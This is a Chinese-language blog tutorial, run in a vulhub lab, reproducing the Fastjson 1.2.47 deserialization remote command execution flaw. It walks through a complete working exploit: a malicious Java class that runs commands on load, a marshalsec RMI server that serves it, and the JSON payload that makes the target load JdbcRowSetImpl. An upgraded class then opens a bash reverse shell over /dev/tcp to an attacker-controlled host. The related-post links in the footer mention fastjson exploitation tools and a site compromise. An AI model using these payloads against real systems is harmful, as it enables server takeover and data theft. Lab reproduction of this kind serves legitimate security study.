rmi远程代码执行漏洞_Fastjson 1.2.47 远程命令执行漏洞

最新推荐文章于 2023-11-04 18:22:36 发布
最新推荐文章于 2023-11-04 18:22:36 发布
阅读量420 收藏
点赞数
文章标签: rmi远程代码执行漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39919195/article/details/111818844
版权

各位大佬,最近好么

由于找工作,以及适应新环境,导致快3个月没有更新文章了,感觉有点对不住大家。

话不多说,今天带大家复现一下Fastjson1.2.47远程命令执行漏洞。

漏洞实现流程

准备环境

本次漏洞复现需要有三台设备(两台也可以)

主机A:模拟Fastjson漏洞环境(centos7)

主机B:模拟攻击机,需要开启web服务(windows10)

主机C:搭设RMI服务(可以同主机B配置在一起,我的环境是在centos7下搭建的)

主机A

启动docker服务

service docker start

进入vulhub目录下fastjson ->fastjson1.2.47

启动靶场环境

docker-compose up -d

,

主机B

将以下代码保存为TouchFile.java (红色处为远程命令执行的代码)

import java.lang.Runtime;

import java.lang.Process;

public class TouchFile {

static {

try {

Runtime rt = Runtime.getRuntime();

String[] commands = {"touch", "/tmp/success"};

Process pc = rt.exec(commands);

pc.waitFor();

} catch (Exception e) {

// do nothing

}}}

使用javac将代码编写为TouchFile.class类文件

并将生成的类文件放在web目录下,启动web服务。

主机C

我们需要借助marshalsec项目,启动一个RMI服务器,监听4444端口,并加载远程类(需要java 8环境)

下载地址:https://github.com/mbechler/marshalsec

安装maven

yum install -y maven

切换到marshalsec目录下使用maven进行打包

mvn clean package -DskipTests

开启RMI服务(IP-1为主机B的地址)

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://IP-1/#TouchFile" 4444

此处一定要注意格式 类只要写名字即可,不需要加.class,其次类名前要加#

现先,把所需要的环境就准备好了,真心不容易啊,小编看了好多文章,踩了好多雷才搭建好。马上就要到漏洞复现的环节,有没有点小兴奋........嘻嘻

漏洞复现

访问主机A的ip地址加端口号(8090)并使用burp抓包,将请求包发到Repeater模块。

修改请求模式为POST,将content-type修改为application/json,然后在请求体中输入下面的JSON对象。(IP-2为主机C的地址)

{

"a":{

"@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl"

},

"b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://IP-2:4444/Exploit",

"autoCommit":true

} }

构造完的请求包如下图:

验证一下命令是否执行成功:

主机A下执行docker ps 查看容器id

进入容器

docker exec -it 5ca5facc4a25 bash

查看/tmp目录下是否成功生成success文件,有则表示生成成功

复现升级

既然都可以创建目录了,那就用来弹个shell吧修改java代码,并重新编译(IP-3为接受shell的主机,我用的kali,端口设置为kali监听端口)

// javac shell.java

import java.lang.Runtime;

import java.lang.Process;

public class shell {

static {

try {

Runtime rt = Runtime.getRuntime();

String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/IP-3/port 0>&1"};

Process pc = rt.exec(commands);

pc.waitFor();

} catch (Exception e) {

// do nothing

}}}

重新启动一个RMI服务

kali使用nc进行监听设置的端口,然后抓包改包发送(与之前流程一样,但注意一定要先监听)

发包后就发现kali接收到反弹的shell了。

今天的知识点到这里就结束了,咱们下次见!

Nothing seek, nothing find.

weixin_39919195
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-12 2万+
本文是Fastjson1.2.24漏洞复现,包括漏洞原理、漏洞利用(远程创建文件)、漏洞利用(反弹shell)。使用vulhub靶场进行搭建,保姆级教程,还望大家多多支持。
某网站Getshell记录
江左盟的博客
04-28 1万+
信息收集 访问网站发现前台为静态页面,且不存在robots.txt文件。然后扫描网站目录发现网站后台路径adminxxx/login.jsp,且网站存在目录遍历漏洞,通过该漏洞可查看到一些身份证、姓名、住址和电话号码等敏感信息,如图: 漏洞发现及利用 访问网站后台登录界面,如图: 验证码明文返回 使用sqlmap测试未发现SQL注入漏洞,通过抓包发现验证码直接返回到HTTP Response中,如图: 弱口令 使用Python编写脚本进行字典暴破弱口令,然后喝茶打游戏,一段时间后发现弱口令:admin
漏洞复现】fastjson_1.2.24_unserializer_rce
最新发布
过期的秋刀鱼
11-04 276
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。发送POC到FastJson服务器,通过RMI协议远程加载恶意类。
Fastjson小小总结
qq_45462249的博客
07-17 376
Fastjson总结
如何保护企业网络免受DDoS攻击?—Vecloud微云
vecloud的博客
09-21 117
使DNS服务器成为放大攻击的目标选择的原因在于,它们的Internet基础结构旨在每分钟处理数百万个请求,并连接到高带宽链接以处理这种流量。 因此,犯罪者利用DNS服务器行为来放大攻击,并将最初的小查询转变为较大的有效负载,从而使服务器停机。 DNS服务器负责将域名解析为IP地址。DNS放大攻击将带有被攻击者的伪造IP地址的DNS查询发送到一个开放的DNS解析器,提示其使用DNS响应来回复该地址。随着大量虚假查询的发出,网络很快就会被大量的DNS响应所淹没。大量的虚假流量将使网络变慢或产生不存在的连接。 .
通过RMI实现远程调用.rar_RMI java
09-23
通过RMI实现远程调用一个JAVA小程序
RMI.zip_Distributed Systems_远程调用系统
09-23
该程序是用java编写的一个用rmi远程调用的分布式会议系统,纯属原创,供大家参考和学习
java_rmi漏洞利用工具
05-31
本项目使用socket直接发送数据包来攻击rmi,通过反序列化攻击rmi,双击直接运行,对1099端口的rmi服务直接进行漏洞检测。
rmi.zip_Java RMI_java rmi网络_java源代码 RMI
09-22
简单的java网络编程 rmi代码 简单 实用
RMI+Zookeeper实现远程调用框架_Java_RMI java
09-23
RMI+Zookeeper实现远程调用框架https://blog.csdn.net/kingcat666/article/details/78579259
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
fastjson1.2.69反序列化远程代码执行漏洞介绍fastjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。阿里云应急响应中心提醒fastjson用户尽快采取安全措施阻止漏洞攻击
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer2 127.0.0.1 80 "whoami" java -cp fastjson_tool.jar fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex java -cp
C#笔记14 方法01
Tervor_HAN的博客
09-17 512
C#笔记14 方法01 ——本系列是基于人民邮电出版社《C#2008 C#图解教程》、清华大学出版社《C#入门经典(第五版)》两本书的自学C#笔记,如果您发现了本文的纰漏,还望不吝指正。 写在前边 在 C#笔记10 类:基础 中,我们已经知道,方法是类中重要的一个函数成员 除了类中,方法也可以声明在结构体,接口中 *复习:方法是具有名称的可执行代码块,当方法被调用时,它执行自己所含的代码,然后返回到调用它的代码。有些方法返回一个值到它们被调用的位置。 1. 方法的结构 在类的相关笔记中,我们已经知道了如何声
Java RMI 远程代码执行漏洞
LuckySec
11-30 3182
Java RMI服务是远程方法调用,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程Java对象,可以从另一个Java虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。在RMI的通信过程中,默认使用序列化来完成所有的交互,如果该服务器Java RMI端口(默认端口1099)对公网开放,且使用了存在漏洞的Apache Commo
fastjson反序列化利用
Jiajiajiang_的博客
11-27 3497
这是对fastjson反序列化的一次利用,关键信息会进行打码处理,且对方此漏洞已修复。 首先确定下是否使用了fastjson 在使用了json传数据的地方,尝试用一些特殊符号打算json的结构,使程序报错。 我们尝试利用fastjson漏洞 参考及需要文件下载:https://github.com/CaijiOrz/fastjson-1.2.47-RCE/ 将下载好的其中一...
c++ 检查远程主机端口_Fastjson<=1.2.47版本远程代码执行漏洞复现
weixin_39859061的博客
11-24 218
一、漏洞介绍0x01 fastjson介绍 Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。它可以解析JSON 格式的字符串,支持将 Java Bean序列化为JSON字符串,也可以从 JSON 字符串反序列化 Java Bean。0x02 漏洞介绍 Fastjson提供了autotype功能,...
Fastjson反序列化漏洞
热门推荐
LJH1999ZN的博客
03-31 3万+
一、fastjson简介 fastjson是java的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,parseObject 方法则反过来将 JSON 字符串转换成对象。 二、fastjson反序列化漏洞原理 在反序列化的时候,会进入parseField方法,进
框架/组件漏洞系列2:fastjson漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-04 1万+
一、Fastjson 概况 1、fastjson简介 Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。具有执行效率高的特点,应用范围广泛。 优点: FastJson数度快,无论序列化和反序列化,都是当之无愧的fast 功能强大(支持普通JDK类包括任意Java Bean Class、Collection、Map、Date或enum) 零依赖(没有依赖其它任何类库) 2、漏洞.
rmi远程代码执行漏洞_Fastjson远程代码执行漏洞复现
weixin_36088083的博客
12-31 369
fastjson漏洞简介Fastjson是一个Java库,可用于将Java对象转换为其JSON表示形式。它还可以用于将JSON字符串转换为等效的Java对象,fastjson爆出多个反序列化远程命令执行漏洞,攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。fastjson漏洞原理先来分析fastjson 1.2.47的POC{"a": {"@type": "java.lang.Class","v...
fastjson1.2.47漏洞复现
07-27
- *1* *3* [Fastjson命令执行漏洞复现(1.2.471.2.24)](https://blog.csdn.net/xiaobai_20190815/article/details/124117105)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值